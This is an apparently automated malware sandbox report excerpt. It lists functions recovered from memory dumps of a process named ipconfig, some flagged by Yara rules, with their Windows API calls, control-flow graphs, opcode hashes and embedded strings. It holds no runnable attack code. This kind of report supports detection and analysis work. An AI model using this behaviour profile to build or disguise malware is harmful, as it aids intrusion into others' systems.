              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 09012cec0a39b3f0d8440ac60e6b6d23204efb1befcc8406bd26091bb6c9e771
              • Instruction ID: 809621879378eb179bbf4677e66ea6ee156697f6477a67daf496a5f615f7db6d
              • Opcode Fuzzy Hash: 09012cec0a39b3f0d8440ac60e6b6d23204efb1befcc8406bd26091bb6c9e771
              • Instruction Fuzzy Hash: BC90027134100842D50061994805B97000D97E0381F51D016A4124654D8655C851B561
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02ED9FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: f691b749d4f2d3bb159d931f759e3618c737ea54fdb456d36cfaf4328404aa19
              • Instruction ID: edabb6ff075db51e3783a501019b7fe5912920721929245f0cec8b74ac5c3730
              • Opcode Fuzzy Hash: f691b749d4f2d3bb159d931f759e3618c737ea54fdb456d36cfaf4328404aa19
              • Instruction Fuzzy Hash: 0F90027135114402D51061998805757000D97D1281F51D411A4824558D86D58891B162
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02ED9780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: b52643f0c7f703e62a507c1f25d029360e66f001b6ee8edde09f8c277486d6e9
              • Instruction ID: 621fae9843d010059b3549309f615f8f7b9cbe45d6d7c916d5d613c4fff812ec
              • Opcode Fuzzy Hash: b52643f0c7f703e62a507c1f25d029360e66f001b6ee8edde09f8c277486d6e9
              • Instruction Fuzzy Hash: 0290026935300002D5807199580965B000D97D1282F91E415A4015558CC9558869A361
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02ED9710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: e66c1a467fe7f706a427b9bd7e8d944c2264b7df5b981734b72898e440320a4b
              • Instruction ID: 6b72f6eeed5ab3ca2123bad1d0ed9e8ae8db0cb2b2bfb03a0bf1ae3648f22f0a
              • Opcode Fuzzy Hash: e66c1a467fe7f706a427b9bd7e8d944c2264b7df5b981734b72898e440320a4b
              • Instruction Fuzzy Hash: 5B90027134100402D50065D95809697000D97E0381F51E011A9024555EC6A58891B171
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02ED95D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 162d56f49dc994b526a7ba66d1e5691c064d7be3b82d54a8f740b871e5401364
              • Instruction ID: 1bbfcadef8eb44864cda159de37a56837cbe5a7045d217de18fb3e6edb0d0a4f
              • Opcode Fuzzy Hash: 162d56f49dc994b526a7ba66d1e5691c064d7be3b82d54a8f740b871e5401364
              • Instruction Fuzzy Hash: 0A9002A134200003450571994815667400E97E0281B51D021E5014590DC5658891B165
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02ED9540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 3491fbb361e25ce38124abe1541927d5d099641c4a04c32a4efe3f4b43eb902a
              • Instruction ID: e2c52d12c37b225461b4c686a7445bcf78dcbd887aff44896001c56f551b3a0c
              • Opcode Fuzzy Hash: 3491fbb361e25ce38124abe1541927d5d099641c4a04c32a4efe3f4b43eb902a
              • Instruction Fuzzy Hash: 86900475351000030505F5DD0F05557004FD7D53D1351D031F5015550CD771CC71F171
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02A172F0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 249 2a172f0-2a1731f 250 2a1732b-2a17332 249->250 251 2a17326 call 2a1a010 249->251 252 2a17338-2a17388 call 2a1a0e0 call 2a09b30 call 2a13e40 250->252 253 2a1740c-2a17412 250->253 251->250 260 2a17390-2a173a1 Sleep 252->260 261 2a173a3-2a173a9 260->261 262 2a17406-2a1740a 260->262 263 2a173d3-2a173f3 261->263 264 2a173ab-2a173d1 call 2a16f20 261->264 262->253 262->260 266 2a173f9-2a173fc 263->266 267 2a173f4 call 2a17120 263->267 264->266 266->262 267->266
              APIs
              • Sleep.KERNELBASE(000007D0), ref: 02A17398
              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2a00000_ipconfig.jbxd
              Yara matches
              Similarity
              • API ID: Sleep
              • String ID: net.dll$wininet.dll
              • API String ID: 3472027048-1269752229
              • Opcode ID: dfdd02c9d205f7edcce6d90c41715236450bbc0df59608cf7bde5becdf42e346
              • Instruction ID: 8467878a83cb6025388ae1b2c4893c0304dcd1be0cb1151f64556ef298c053bc
              • Opcode Fuzzy Hash: dfdd02c9d205f7edcce6d90c41715236450bbc0df59608cf7bde5becdf42e346
              • Instruction Fuzzy Hash: 9F3190B6641704ABC715DF64CCA0FABF7B9EF48710F00811DFA1A9B241DB30A445CBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02A172E6 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 79sleepCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 269 2a172e6-2a17332 call 2a1a010 272 2a17338-2a17388 call 2a1a0e0 call 2a09b30 call 2a13e40 269->272 273 2a1740c-2a17412 269->273 280 2a17390-2a173a1 Sleep 272->280 281 2a173a3-2a173a9 280->281 282 2a17406-2a1740a 280->282 283 2a173d3-2a173f3 281->283 284 2a173ab-2a173d1 call 2a16f20 281->284 282->273 282->280 286 2a173f9-2a173fc 283->286 287 2a173f4 call 2a17120 283->287 284->286 286->282 287->286
              APIs
              • Sleep.KERNELBASE(000007D0), ref: 02A17398
              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2a00000_ipconfig.jbxd
              Yara matches
              Similarity
              • API ID: Sleep
              • String ID: net.dll$wininet.dll
              • API String ID: 3472027048-1269752229
              • Opcode ID: de99a95039616fab975ac0e19144ad7ed8328b7cc4c110fdcc7ee9abe50145c2
              • Instruction ID: e2ba68503889f04c9daa1ad28ad58b3996595adc1275dd1d41551e4950a85cb4
              • Opcode Fuzzy Hash: de99a95039616fab975ac0e19144ad7ed8328b7cc4c110fdcc7ee9abe50145c2
              • Instruction Fuzzy Hash: 88218DB6A41301ABC711DF64C8A1FABFBB9EF48710F008159FA199B281DB70A445CBA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02A188D2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25memoryCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 295 2a188d2-2a188f4 298 2a188fc-2a18911 RtlFreeHeap 295->298 299 2a188f7 call 2a191d0 295->299 299->298
              APIs
              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02A03B93), ref: 02A1890D
              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2a00000_ipconfig.jbxd
              Yara matches
              Similarity
              • API ID: FreeHeap
              • String ID: .z`
              • API String ID: 3298025750-1441809116
              • Opcode ID: fa4749a25496dd26388f713ecfec600d802b5b35bb1d5694f5eacd24b7120c46
              • Instruction ID: 33451fb6697e9093954001e0d3fc115a75404451f50437232c34642aeb49e726
              • Opcode Fuzzy Hash: fa4749a25496dd26388f713ecfec600d802b5b35bb1d5694f5eacd24b7120c46
              • Instruction Fuzzy Hash: 4EE0D8B82041829FDB08EFA9C9D085F3796AF853147148946E84857345C970D81ACAB2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02A188E0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 300 2a188e0-2a18911 call 2a191d0 RtlFreeHeap
              APIs
              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02A03B93), ref: 02A1890D
              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2a00000_ipconfig.jbxd
              Yara matches
              Similarity
              • API ID: FreeHeap
              • String ID: .z`
              • API String ID: 3298025750-1441809116
              • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
              • Instruction ID: b6a20d5f6475694921570dfc88bf8a6a69d4bbc45447a49222e985a95fbcc03d
              • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
              • Instruction Fuzzy Hash: 13E046B1200208ABDB18EF99CC48EA777ADEF88760F018558FE0C5B241CA30F914CAF0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02A07307 Relevance: 3.2, APIs: 2, Instructions: 186threadwindowCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 303 2a07307-2a0730b 304 2a0730d 303->304 305 2a0735f-2a07368 303->305 306 2a072b0-2a072bd 304->306 307 2a0730f-2a0735a call 2a1a130 call 2a07280 call 2a199c0 304->307 308 2a07370-2a073a2 call 2a0d3c0 call 2a18770 305->308 310 2a072c3-2a072ca 306->310 311 2a072be call 2a13e40 306->311 307->305 325 2a073a4-2a073ac 308->325 326 2a073d7-2a073df 308->326 314 2a072cc-2a072de PostThreadMessageW 310->314 315 2a072fe-2a07302 310->315 311->310 317 2a072e0-2a072fb call 2a09290 PostThreadMessageW 314->317 318 2a072fd 314->318 317->318 318->315 328 2a073c6-2a073d0 325->328 329 2a073ae-2a073b5 325->329 328->308 332 2a073d2-2a073d5 328->332 329->328 331 2a073b7-2a073be 329->331 331->328 333 2a073c0-2a073c4 331->333 334 2a073fd-2a0740f call 2a18700 332->334 333->328 335 2a073e0-2a073fa call 2a1a0b0 333->335 334->326 340 2a07411-2a0747c call 2a17f80 334->340 335->334 340->326 343 2a07482-2a074de call 2a17fc0 340->343 343->326 346 2a074e4-2a07531 call 2a19660 call 2a19680 call 2a1a3a0 call 2a1a0b0 call 2a13a40 343->346
              APIs
              • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02A072DA
              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02A072FB
              Memory Dump Source
              • Source File: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2a00000_ipconfig.jbxd
              Yara matches
              Similarity
              • API ID: MessagePostThread
              • String ID:
              • API String ID: 1836367815-0
              • Opcode ID: 1b59d593f1bbb02927b9e173bfd06006721682c440f11bd0ae485acaaf1a20ab
              • Instruction ID: 201f2e21f9963e4b2dd2815f49a47823548af021e0a2000878c7919c218da51c
              • Opcode Fuzzy Hash: 1b59d593f1bbb02927b9e173bfd06006721682c440f11bd0ae485acaaf1a20ab
              • Instruction Fuzzy Hash: A961A370940209AFEB25DF64DDC5BEBB7B8EF49314F1004ADE94997281DB70A941CFA2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02A07280 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
              Download Yara Rule

              Control-flow Graph

              APIs
              • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02A072DA
              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02A072FB
              Memory Dump Source
              • Source File: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2a00000_ipconfig.jbxd
              Yara matches
              Similarity
              • API ID: MessagePostThread
              • String ID:
              • API String ID: 1836367815-0
              • Opcode ID: 6242364d1d39fb105e909873f335ffe36d8bf3a77fb545fb0355dcaf9b4bdb5d
              • Instruction ID: f2b4e87660a1eb51c6fafab347bf9fc7575983d2d3983afeac49224aeaa473ac
              • Opcode Fuzzy Hash: 6242364d1d39fb105e909873f335ffe36d8bf3a77fb545fb0355dcaf9b4bdb5d
              • Instruction Fuzzy Hash: 8F01F731A803297BE720AA949D42FBFB76C5F04F60F140014FF04BA1C1EEA479058AF5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02A18A75 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 567 2a18a75-2a18a78 568 2a18a7a-2a18a7b 567->568 569 2a18a4c-2a18a5a call 2a191d0 567->569 570 2a18ac5-2a18ad2 568->570 571 2a18a7d-2a18a99 568->571 577 2a18a5f-2a18a74 LookupPrivilegeValueW 569->577 575 2a18ada-2a18ae7 570->575 576 2a18ad5 call 2a19240 570->576 573 2a18a9f-2a18ab0 571->573 574 2a18a9a call 2a191d0 571->574 574->573 576->575
              APIs
              • LookupPrivilegeValueW.ADVAPI32(00000000,?,02A0CFB2,02A0CFB2,?,00000000,?,?), ref: 02A18A70
              Memory Dump Source
              • Source File: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2a00000_ipconfig.jbxd
              Yara matches
              Similarity
              • API ID: LookupPrivilegeValue
              • String ID:
              • API String ID: 3899507212-0
              • Opcode ID: 03c6ae98afe7917cc1e5836d62b54f9e28321c5488b7360adf4d48e362288bed
              • Instruction ID: 0e85cc55fc8eef1a2111b67c1cd07f692ace8db1a5cc5f8f0f026d51893d1885
              • Opcode Fuzzy Hash: 03c6ae98afe7917cc1e5836d62b54f9e28321c5488b7360adf4d48e362288bed
              • Instruction Fuzzy Hash: FC11C271200244AFE724EF68CC85EEB7BA9EF44760F148599FD4C5B242CA35E915CBE0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02A09B30 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 580 2a09b30-2a09b4c 581 2a09b54-2a09b59 580->581 582 2a09b4f call 2a1af60 580->582 583 2a09b5b-2a09b5e 581->583 584 2a09b5f-2a09b6d call 2a1b380 581->584 582->581 587 2a09b7d-2a09b8e call 2a19710 584->587 588 2a09b6f-2a09b7a call 2a1b600 584->588 593 2a09b90-2a09ba4 LdrLoadDll 587->593 594 2a09ba7-2a09baa 587->594 588->587 593->594
              APIs
              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02A09BA2
              Memory Dump Source
              • Source File: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2a00000_ipconfig.jbxd
              Yara matches
              Similarity
              • API ID: Load
              • String ID:
              • API String ID: 2234796835-0
              • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
              • Instruction ID: 0fe453df13dd297accb9bb02bf91241b3ba1e14d8598fdd8edffe3266450b878
              • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
              • Instruction Fuzzy Hash: 38015EB5E4020EABDB10DBA0ED81FDEB3799F44718F0045A5EA0897281FA31EB14CB91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02A18950 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
              Download Yara Rule
              APIs
              • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02A189A4
              Memory Dump Source
              • Source File: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2a00000_ipconfig.jbxd
              Yara matches
              Similarity
              • API ID: CreateInternalProcess
              • String ID:
              • API String ID: 2186235152-0
              • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
              • Instruction ID: 06812df190dee9481eeca5b3287c544fdf5b130813a371f34076e9e6f7926397
              • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
              • Instruction Fuzzy Hash: 3201AFB2210108ABCB58DF89DC84EEB77ADAF8C754F158258BA0D97240C630E851CBA4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02A17420 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
              Download Yara Rule
              APIs
              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02A0CCE0,?,?), ref: 02A1745C
              Memory Dump Source
              • Source File: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2a00000_ipconfig.jbxd
              Yara matches
              Similarity
              • API ID: CreateThread
              • String ID:
              • API String ID: 2422867632-0
              • Opcode ID: 5d226fe3085f48d15742a8de89908d048e36806695b904c2474a4bc1bd20e8bd
              • Instruction ID: 352ebec08df666fdda7718ca3ac0a3dbc3a757ba407801ea64e8de5943a94e03
              • Opcode Fuzzy Hash: 5d226fe3085f48d15742a8de89908d048e36806695b904c2474a4bc1bd20e8bd
              • Instruction Fuzzy Hash: 45E06D333803143AE6206599AC42FA7B69C8B81B30F140026FA0DEA2C0D995F80146A4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02A17413 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
              Download Yara Rule
              APIs
              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02A0CCE0,?,?), ref: 02A1745C
              Memory Dump Source
              • Source File: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2a00000_ipconfig.jbxd
              Yara matches
              Similarity
              • API ID: CreateThread
              • String ID:
              • API String ID: 2422867632-0
              • Opcode ID: b5ca66d23bc9a748c421fc1532e805046b5053a28119dd931a3acf4bdb19796f
              • Instruction ID: 8dd03bd736f0dab1481dd0c60bdedfa136bae573418eca271d39ffeae2b70dc3
              • Opcode Fuzzy Hash: b5ca66d23bc9a748c421fc1532e805046b5053a28119dd931a3acf4bdb19796f
              • Instruction Fuzzy Hash: CCF0E5327D17203AD7316A5C8C43FA7B79D9B81F20F150125FA48EB2C1DEA5F80146E5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02A18A3C Relevance: 1.5, APIs: 1, Instructions: 24COMMON
              Download Yara Rule
              APIs
              • LookupPrivilegeValueW.ADVAPI32(00000000,?,02A0CFB2,02A0CFB2,?,00000000,?,?), ref: 02A18A70
              Memory Dump Source
              • Source File: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2a00000_ipconfig.jbxd
              Yara matches
              Similarity
              • API ID: LookupPrivilegeValue
              • String ID:
              • API String ID: 3899507212-0
              • Opcode ID: 8871f57e5913fddf161357be4db82a0c479f3acd76ab6255e8fc0548982bc334
              • Instruction ID: 5b6a99c9e8a2c2c059b209349b930acfe1bde1fc7cb0d0f6d2fecc595dcdd123
              • Opcode Fuzzy Hash: 8871f57e5913fddf161357be4db82a0c479f3acd76ab6255e8fc0548982bc334
              • Instruction Fuzzy Hash: 41E01AB5200208AFDB14DF54CC84EE737A9AF89290F058194FE4C5B241C930E815CBF1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02A18A40 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
              Download Yara Rule
              APIs
              • LookupPrivilegeValueW.ADVAPI32(00000000,?,02A0CFB2,02A0CFB2,?,00000000,?,?), ref: 02A18A70
              Memory Dump Source
              • Source File: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2a00000_ipconfig.jbxd
              Yara matches
              Similarity
              • API ID: LookupPrivilegeValue
              • String ID:
              • API String ID: 3899507212-0
              • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
              • Instruction ID: 27e5a9dd5d5665ebbc38f813c9f9bd0a194378a43945519785f9ab0b8729ed62
              • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
              • Instruction Fuzzy Hash: 36E01AB12002086BDB14DF49CC84EE737ADAF88650F018154BE0C57241C930E814CBF5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02A0D420 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
              Download Yara Rule
              APIs
              • SetErrorMode.KERNELBASE(00008003,?,?,02A07C83,?), ref: 02A0D44B
              Memory Dump Source
              • Source File: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2a00000_ipconfig.jbxd
              Yara matches
              Similarity
              • API ID: ErrorMode
              • String ID:
              • API String ID: 2340568224-0
              • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
              • Instruction ID: a840f31382ffa9fb05afb5917bd47bdc1181cb249b70c9434ed8f9402e502357
              • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
              • Instruction Fuzzy Hash: BED05E627903043AEA10BAA49C42F2676C99B44B14F494064F949D62C3DE54E4004561
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02A07304 Relevance: 1.5, APIs: 1, Instructions: 9threadwindowCOMMON
              Download Yara Rule
              APIs
              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02A072FB
              Memory Dump Source
              • Source File: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2a00000_ipconfig.jbxd
              Yara matches
              Similarity
              • API ID: MessagePostThread
              • String ID:
              • API String ID: 1836367815-0
              • Opcode ID: 65be4dae1ec5f89ba25da349d1c8ee3fb8f6fb0bd4a1134e4bb356b63c2a945f
              • Instruction ID: e5e609d73a169289c519106e8d24f48ec3d70f5982124f15196c48cc2f1303d6
              • Opcode Fuzzy Hash: 65be4dae1ec5f89ba25da349d1c8ee3fb8f6fb0bd4a1134e4bb356b63c2a945f
              • Instruction Fuzzy Hash: A5B0122270C05814C52211587C50378FB58C7CF222F0001F7E90C811804956142146E2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02ED967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 0264de00613f9fd16bbf91954a2b6ef18c29299bdaeb6c004a325488835827a9
              • Instruction ID: 513131e9451e859cfb99fde0820738d255e5b6d6193a4cf84a898a0f977b9435
              • Opcode Fuzzy Hash: 0264de00613f9fd16bbf91954a2b6ef18c29299bdaeb6c004a325488835827a9
              • Instruction Fuzzy Hash: 2DB09B71A414C5C5DA11D7B04E08727790477D0745F16D051D1130645B477CC491F6B5
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              Function 02F4B260 Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE
              Download Yara Rule
              Strings
              • *** A stack buffer overrun occurred in %ws:%s, xrefs: 02F4B2F3
              • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 02F4B484
              • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 02F4B3D6
              • Go determine why that thread has not released the critical section., xrefs: 02F4B3C5
              • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 02F4B39B
              • *** Resource timeout (%p) in %ws:%s, xrefs: 02F4B352
              • The instruction at %p tried to %s , xrefs: 02F4B4B6
              • The resource is owned shared by %d threads, xrefs: 02F4B37E
              • *** enter .exr %p for the exception record, xrefs: 02F4B4F1
              • read from, xrefs: 02F4B4AD, 02F4B4B2
              • an invalid address, %p, xrefs: 02F4B4CF
              • a NULL pointer, xrefs: 02F4B4E0
              • This failed because of error %Ix., xrefs: 02F4B446
              • The critical section is owned by thread %p., xrefs: 02F4B3B9
              • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 02F4B2DC
              • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 02F4B476
              • *** An Access Violation occurred in %ws:%s, xrefs: 02F4B48F
              • The resource is owned exclusively by thread %p, xrefs: 02F4B374
              • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 02F4B47D
              • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 02F4B53F
              • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 02F4B38F
              • *** Inpage error in %ws:%s, xrefs: 02F4B418
